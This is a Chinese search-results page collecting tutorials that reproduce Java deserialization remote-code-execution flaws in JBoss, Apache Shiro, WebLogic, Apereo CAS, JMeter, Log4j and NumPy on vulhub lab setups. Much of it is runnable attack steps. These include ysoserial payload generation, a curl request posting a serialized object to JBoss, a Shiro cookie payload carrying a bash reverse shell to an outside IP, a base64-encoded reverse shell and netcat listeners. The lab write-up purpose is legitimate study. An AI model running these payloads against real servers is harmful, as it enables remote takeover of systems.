精华内容
下载资源
问答
  • 本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程仅供学习靶机地址:192.168.1.102 服务端口:8080测试机:192.168.1.100响应码500,证明漏洞存在。下载漏洞利用工具:...

    本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程

    仅供学习

    靶机地址:192.168.1.102  服务端口:8080

    测试机: 192.168.1.100

    63fd7b347853b5ae8dd26dee8bb60243.png  

    c83784de0b572c64cbe29cb61b18d161.png

    响应码500,证明漏洞存在。

    下载漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip

    编译:(需要java环境)

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

    运行:

    java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port   //反弹shell的IP和端口

    starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

    starnight:JavaDeserH2HC starnight$ java-cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337Saving serializedobject in ReverseShellCommonsCollectionsHashMap.ser

    这样就会将序列化对象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令发送到Jboss服务地址。

    先在测试机运行nc命令,进入监听模式:

    starnight:temp starnight$ nc -lvv 1337

    再打开另一个控制台,运行如下curl命令:

    starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

    运行截图:

    56b63e9ca60988da215fd508c35fa16d.png

    左侧是获取到shell,并执行命令。右侧是用curl命令运行截图。

    References

    展开全文
  • Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell题外话1题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生原因: shiro默认使用了CookieRememberMeManager,其处理cookie的流程是...

    Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现


    影响版本:Apache Shiro <= 1.2.4
    漏洞产生原因:

    shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。
    然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。使用大佬脚本生成 payload(ysoserial.jar文件和运行目录处于同一目录)

    漏洞环境搭建

    1.拉取镜像
    docker pull medicean/vulapps:s_shiro_1
    2.启动环境
    docker run -d -p 80:8080 -p 7777:6666 medicean/vulapps:s_shiro_1
    如需进入环境,命令为
    docker exec -it name /bin/bash
    3.web访问
    http://127.0.0.1 能看到如下页面即可
    在这里插入图片描述
    或虚拟机外面用真实ip访问
    在这里插入图片描述至此漏洞环境搭建成功

    漏洞复现

    1.抓包测试
    查看返回包里setcookie有rememberme的字样
    在这里插入图片描述
    2.继续测试
    首先最简单的测试方法是用dnslog,看看是否有回显。
    利用POC生成想要执行的命令对应的rememberMe
    3.工具准备
    在这里插入图片描述
    生成payload的脚本使用的是python3,运行报错就安装一下模块
    4.生成payload:
    双引号中是想要执行的命令,如果这里没有公网VPS,就用dnslog来证明。攻击原理一样,不认可的杠精可直接怼

    py -3 shiro_1.2.4.py "ping 39p2wo.dnslog.cn"
    

    运行结果如下图:
    在这里插入图片描述
    然后便会在脚本所在目录下生成文件payload.cookie

    5.回到浏览器抓包

    用payload.cookie中的rememberMe内容加入Cookie中,或者直接放进参数中,提交看页面回显和dnslog页面是否有数据过去
    6.到ceye平台查看日志记录
    dnslog日志刷新后有记录了,说明payloda执行成功
    在这里插入图片描述

    反弹shell

    当然了,有VPS的情况下,为何不反弹一下shell呢?
    1.使用脚本生成key
    反弹shell的命令:bash -i >& /dev/tcp/22.45.13.9/7878 0>&1

    py -3 shiro_1.2.4.py "bash -i >& /dev/tcp/22.45.13.9/7878 0>&1"
    

    PS:ip假的,不打码,观看流畅
    2.先公网VPS监听反弹shell的命令

    nc -lvp 7878
    

    在这里插入图片描述
    3.加入payload,提交数据包
    在这里插入图片描述
    这里使用curl也能达到burp的效果

    // 加 -I 是只看响应头,这里主要关注set-cookie:rememberMe
    curl -X GET http://172.16.12.132 --cookie “xxxxxxxxxxxxx” -I
    

    讲这个是因为此方法可以用来初步探测shiro信息
    在这里插入图片描述

    4.vps收到了反弹回来的shell

    在这里插入图片描述

    题外话1

    研究这个漏洞,是因为客户要求排查下资产,然后找不到集成的工具和一键式检查的。
    漏洞的事情OK了,还是觉得自己太菜,要是代码够给力,写个集成的丢github上就真的香。

    题外话2

    还有一个思路,看大佬文章时,这里一直没搞懂。字面意思是用ysoserial中的JRMP监听模块来搞定的,后续学会了再补上笔记

     java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 3888 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}'
    

    在这里插入图片描述
    参考链接:
    https://www.jianshu.com/p/0007eafd1f92
    https://www.secpulse.com/archives/112742.html

    展开全文
  • Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) by ADummy 0x00利用路线 ​ 启动一个JRMP Server—>执行exp文件—>命令执行 0x01漏洞介绍 ​ 在 WebLogic 里,攻击者利用其他rmi绕...

    Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

    by ADummy

    0x00利用路线

    ​ 启动一个JRMP Server—>执行exp文件—>命令执行

    0x01漏洞介绍

    ​ 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

    影响版本
     Weblogic 10.3.6.0
     Weblogic 12.1.3.0
     Weblogic 12.2.1.2
     Weblogic 12.2.1.3
    

    0x02漏洞复现

    快速检测利用nmap --script=weblogic-t3-infi.nse

    首先下载ysoserial,并启动一个JRMP Server:

    java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
    

    其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。

    然后,使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

    python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
    

    其中,[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip][JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClientJRMPClient2

    exploit.py执行完成后,执行docker-compose exec weblogic bash进入容器中,可见/tmp/success已成功创建。

    在这里插入图片描述
    在这里插入图片描述

    0x03参考资料

    https://blog.csdn.net/csacs/article/details/87122472

    poc:https://github.com/ADummmy/vulhub_Writeup/blob/main/code/Weblogic_WLS_Core_Components_CVE_2018_2628.py

    展开全文
  • Apereo CAS 4.1 反序列化命令执行漏洞 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标...

    Apereo CAS 4.1 反序列化命令执行漏洞

     

    Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

     

    参考链接:

     

    环境搭建

     

    执行如下命令启动一个Apereo CAS 4.1.5:

     

    docker-compose up -d

     

    环境启动后,访问http://your-ip:8080/cas/login即可查看到登录页面。

     

    漏洞复现

     

    漏洞原理实际上是Webflow中使用了默认密钥changeit

     

    public class EncryptedTranscoder implements Transcoder {
        private CipherBean cipherBean;
        private boolean compression = true;
    
        public EncryptedTranscoder() throws IOException {
            BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
            bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
            bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
            bufferedBlockCipherBean.setKeyAlias("aes128");
            bufferedBlockCipherBean.setKeyPassword("changeit");
            bufferedBlockCipherBean.setNonce(new RBGNonce());
            this.setCipherBean(bufferedBlockCipherBean);
        }
    
        // ...

     

    我们使用Apereo-CAS-Attack来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload:

     

    java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

     

    image.png

     

    然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:

     

    POST /cas/login HTTP/1.1
    Host: your-ip
    Content-Length: 2287
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://your-ip:8080
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://your-ip:8080/cas/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: JSESSIONID=24FB4BAAE1A66E8B76D521EE366B3E12; _ga=GA1.1.1139210877.1586367734
    Connection: close
    
    username=test&password=test&lt=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN

     

     

     

    登录Apereo CAS,可见touch /tmp/success已成功执行:

    image.png

     

    现在我们来看看弹shell,顺便介绍两个好用的网站。

     

    image.png

     

    image.png

     

    http://8.210.235.249/

    http://jackson-t.ca/runtime-exec-payloads.html

     

    一个是生成shell,一个是shell加密。

    开始连接吧。

    image.png

    image.png

    拿下。

    这个工具下载可能比较慢,下不下来的同学可以联系我球球MTQ0NzM1MzU1Nw==,找我要就行。

    展开全文
  • (CVE-2020-7961)Liferay Portal RCE 反序列化命令执行漏洞 一、漏洞描述 Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器...
  • 漏洞描述互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。影响范围漏洞影响5.x和6.x版本...
  • vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
  • Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ ...
  • 在 NumPy 1.16.0 版本之前存在反序列化 命令执行漏洞,用户加载恶意的数据源造成命令执行。2、环境 软件环境如下:NumPy 1.16.0Windows10PyCharm 2018.3.23、漏洞分析先来看漏洞的入口,lib/npyio.p...
  • 在 NumPy 1.16.0 版本之前存在反序列化 命令执行漏洞,用户加载恶意的数据源造成命令执行。2、环境 软件环境如下:NumPy 1.16.0Windows10PyCharm 2018.3.23、漏洞分析先来看漏洞的入口,lib/npyio.p...
  • 利用phar实行php反序列化命令执行(测试环境复现) 前言 一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题”It’s a PHP unserialization vulnerability Jim, but not as ...
  • Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/log4j/CVE-2017-5645/ 漏洞原理 Apache ...
  • 环境搭建 漏洞测试 抓包测试 查看返回包里setcookie有...dns发现有回显,说明存在反序列化漏洞漏洞复现 1.监听回弹shell 2.生成key 3.使用ysoserial中JRMP监听模块,监听9920端口 4.重放 5.收到返回shell...
  • JBOSS AS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)1. 漏洞描述 漏洞描述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何...
  • 在NumPy 1.16.0版本之前存在反序列化命令执行漏洞,用户加载恶意的数据源造成命令执行。2、环境软件环境如下:NumPy 1.16.0Windows10PyCharm 2018.3.23、漏洞分析先来看漏洞触发位置,位置在lib/npyio.py...
  • 其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 影响版本 Apereo CAS <= 4.1.7 环境搭建 这里我使用vulhub来安装环境 ...
  • 本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习  文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)  靶机地址:192.168.1.102 服务端口:8080  ...
  • 在 NumPy 1.16.0 版本之前存在反序列化 命令执行漏洞,用户加载恶意的数据源造成命令执行。2、环境 软件环境如下: NumPy 1.16.0Windows10 PyCharm 2018.3.23、漏洞分析先来看漏洞的入口,lib/npyi...
  • 0x00 影响版本Apache Shiro <= 1.2.40x01 原因分析Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到...然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE...
  • 其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。 影响范围 2.x 3.x 复现过程 这里使用3.3版本 使用vulhub /app/vulhub-master/jmeter/CVE-2018-1297 使用docker启动 ...
  • 其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。 影响版本 Liferay Portal: 6.1、6.2、7.0、7.1、7.2 环境搭建 cd /vulhub/liferay-portal/CVE-2020-7961 ...
  • 前段时间学校学习J2EE,用到了jboss,顺便看了下jboss的反序列化,再浅谈下反序列化漏洞。Java序列化,简而言之就是把java对象转化为字节序列的过程。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一...
  • 2017-7504)一、漏洞描述Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。...
  • 声明 好好学习,天天向上 漏洞描述 Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/...其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞,攻击者利用这个漏洞可以
  • 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulhub搭建搭建漏洞环境 5.2 如何检测是否使用Shiro框架 5.3 insightglacier/Shiro_exploit复现 5.4 sv3nbeast/ShiroScan复现 5.5 feihong-cs...
  • 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 442
精华内容 176
热门标签
关键字:

反序列化命令执行漏洞